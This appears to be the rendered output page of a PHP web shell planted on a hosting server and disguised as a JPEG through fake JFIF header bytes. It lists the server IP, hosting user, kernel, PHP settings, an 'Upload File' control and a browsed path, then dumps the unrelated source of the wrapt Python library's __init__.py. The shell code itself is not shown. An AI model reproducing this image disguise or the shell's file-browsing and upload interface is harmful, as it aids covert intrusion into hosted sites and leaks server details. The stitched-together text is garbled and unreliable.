���� JFIF fdasasfas213sdaf
Server IP : 93.127.173.53 / Your IP : 216.73.216.222 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/alt/python311/lib64/python3.11/site-packages/wrapt/ |
Upload File : |
__version_info__ = ('1', '16', '0') __version__ = '.'.join(__version_info__) from .__wrapt__ import (ObjectProxy, CallableObjectProxy, FunctionWrapper, BoundFunctionWrapper, PartialCallableObjectProxy) from .patches import (resolve_path, apply_patch, wrap_object, wrap_object_attribute, function_wrapper, wrap_function_wrapper, patch_function_wrapper, transient_function_wrapper) from .weakrefs import WeakFunctionProxy from .decorators import (adapter_factory, AdapterFactory, decorator, synchronized) from .importer import (register_post_import_hook, when_imported, notify_module_loaded, discover_post_import_hooks) # Import of inspect.getcallargs() included for backward compatibility. An # implementation of this was previously bundled and made available here for # Python <2.7. Avoid using this in future. from inspect import getcallargs # Variant of inspect.formatargspec() included here for forward compatibility. # This is being done because Python 3.11 dropped inspect.formatargspec() but # code for handling signature changing decorators relied on it. Exposing the # bundled implementation here in case any user of wrapt was also needing it. from .arguments import formatargspec